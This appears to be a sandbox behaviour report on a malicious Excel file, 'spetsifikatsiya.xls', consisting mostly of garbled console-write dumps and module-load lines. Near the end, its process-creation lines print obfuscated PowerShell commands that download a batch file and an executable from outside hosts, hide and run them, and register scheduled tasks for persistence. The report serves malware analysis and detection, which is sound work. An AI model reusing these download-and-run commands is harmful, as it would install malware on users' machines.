Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w....... . . .I.t.e.m.C.o.m.m.a.n.d.......1.............}..v....(.......0.\.............x............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w..................j......................1.............}..v....`.......0.\............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j......................1.............}..v............0.\.............x............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................1.............}..v....(.......0.\............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#.........h.......F...............F.......A.....`IC........v.....................KJ.............r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j.....z................1.............}..v.....z......0.\...............w.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v.....~......0.\.............8.w.....$.......h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j....P.................1.............}..v............0.\...............w.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.1.............}..v............0.\.............8.w.....".......h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;..................j......................1.............}..v............0.\...............w.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j......w...............1.............}..v....@.......0.\.....................`.......h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j......................1.............}..v....x.......0.\...............w.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j......w...............1.............}..v............0.\.....................^.......h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j....X.................1.............}..v............0.\...............w.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._..................j......w...............1.............}..v............0.\.....................`.......h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._..................j......................1.............}..v....8.......0.\...............w.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j......w...............1.............}..v............0.\.............................h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j......................1.............}..v....8.......0.\...............w.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w....... . . .o.c.a.t.i.o.n.C.o.m.m.a.n.d.1.............}..v....H.......0.\.............8.w.....".......h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w..................j......................1.............}..v............0.\...............w.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j......w...............1.............}..v............0.\.............8.w.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................1.............}..v....H.......0.\...............w.............h............... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............................@{?......................k..U.....................C.............(.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............X.*.....2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............m.o.d.e........./.........................*......$.J............/...............8.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... .1.8.,.1. .............................$d..U...m.o.d.e..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\.......................................................$d..U...m.o.d.e..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............................@{?......................k..U.....................C.............(.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............X.*.....2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............c.o.l.o.r......./.........................*......$.J............/...............8.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H............... .F.E. .................................$d..U...c.o.l.o..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H.......................................................$d..U...c.o.l.o..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H........................................................k..U.....................C.............(.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............X.*.....2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............s.e.t.l.o.c.a.l./.........................*......$.J............/...............8.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H.......................................................$d..U...s.e.t.l..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H..................................J.....................k..U...`{.J..............C.............(.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............f.o.r...........`{.J....................$d..U...X%.J.............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H............... ./.F...........`{.J....................$d..U...X%.J.............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H............... .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H............... .%.i. .i.n. ...=.4.-.5.................$d..U...X%.J.............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............(.'.v.e.r.'.). .d.o. .5.................$d..U...X%.J.............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............s.e.t...........d.o. .5.................$d..U...X%.J.............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H............... .V.E.R.S.I.O.N.=.%.i...%.j. ............d..U...s.e.t............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H................................DC.....................$d..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................p.D.....................di..U............iC.......................*..............iC............. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............*.....2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................s.e.t............\D.......................C...............D........J....x.........*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ .V.E.R.S.I.O.N.=.6...1. ...............Dj..U...s.e.t....iC.......................*..............iC............. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................=.6...1.................Dj..U...s.e.t....iC.......................*..............iC............. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................................`{.J.....................k..U....$.J..............C.............(.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............i.f. ...........`{.J....................$d..U...X%.J.............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............".6...1.". .=.=. .".1.0...0.". ..........d..U...i.f. ............DC...............*..... ....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............(................DC..................... .......................d1.........v......*........................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H........................................................d..U...(................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............e.c.h.o.........}..v............................H...............................x.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H............... .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........DC.............H.*.....0....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H............... ..... ..........DC......................e..U....................DC.............x.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................H...............r.e.g...........}..v............................H.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: .........................................................................e..U...r.e.g............DC.....................b....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>.....................................te..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................n.u.l. .................................te..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... .........d1.......................e..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................t.i.m.e.o.u.t...}..v............................(.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ./.t. .2. . ............................j..U...t.i.m.e..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................1.>......................................j..U... ./.t. ..........DC.............X.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............n.u.l. ..................................j..U... ./.t. ..........DC.............X.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... .........d1......................te..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............s.c.h.t.a.s.k.s.}..v............................\...............................X.*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\........................................................j..U...s.c.h.t..........DC.....................v....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............1.>.....................................4j..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............n.u.l. .................................4j..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... .........d1.......................j..U....................DC.............X.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ./.t. .3. . ...........................dj..U...t.i.m.e..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............1.>.....................................Tj..U... ./.t. ..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............n.u.l. .................................Tj..U... ./.t. ..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... .........d1......................4j..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............r.e.g...........d1......................4j..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\.......................................................dj..U...r.e.g............DC.....................T....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\........................................................d..U......J.............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............). ......................................d..U......J.............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\................................DC.....................$d..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............................`{.J.....................k..U....$.J..............C.............(.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............X.*.....2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............i.f. ...........`{.J....................$d..U...X%.J.............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............".6...1.". .=.=. .".6...3.". ............d..U...i.f. ............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............(................DC.............................................d1.........v......*........................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\........................................................d..U...(................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............e.c.h.o.........}..v............................\.......j.......................x.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........DC.............H.*.....2....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................ ..... ..........DC......................e..U....................DC.............x.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................................r.e.g...........}..v....................................~.........................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... .........d1.......................e..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ./.t. .2. . ............................j..U...t.i.m.e..........DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............1.>......................................j..U... ./.t. ..........DC.............X.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............s.c.h.t.a.s.k.s.}..v............................\...............................X.*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............".6...1.". .=.=. .".6...2.". ............d..U...i.f. ............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............e.c.h.o.........}..v............................\.......M.......................x.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........DC.............H.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\............... ..... ..........DC......................e..U....................DC.............x.*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............r.e.g...........}..v............................\......._.........................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\........................................................e..U...r.e.g............DC.....................b....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............1.>.....................................te..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............n.u.l. .................................te..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............s.c.h.t.a.s.k.s.}..v............................\...............................X.*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............t.i.m.e.o.u.t...}..v............................(.................................*............. ..... ......... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............".6...1.". .=.=. .".6...1.". ............d..U...i.f. ............DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............C.m.d...........................................(................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\.......................................................Dd..U...C.m.d............DC............................................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................\...............). ..............DC......................d..U....................DC...............*............................. Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.......*.......*.....x.*.....B....................... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ........................................(.P.............,....................................................................................... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................................X.......(.P.............................Y.......................................................................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................\...........E.R.R.O.R.:. ...........................N.......................................h.#.............................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................\...........E.R.R.O.(.P.............................T...............................................j.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: spetsifikatsiya.xls Virustotal: Detection: 13%
Source: sp.exe String found in binary or memory: id-cmc-addExtensions
Source: sp.exe String found in binary or memory: set-addPolicy
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
Source: unknown Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: unknown Process created: C:\Windows\System32\mode.com mode 18,1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: unknown Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
Source: unknown Process created: C:\Users\user\AppData\Roaming\sp.exe 'C:\Users\user\AppData\Roaming\sp.exe'
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'
Source: unknown Process created: C:\Users\user\AppData\Roaming\sp.exe {path}
Source: unknown Process created: C:\Users\user\AppData\Roaming\sp.exe {path}
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe'
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe'
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat') Jump to behavior
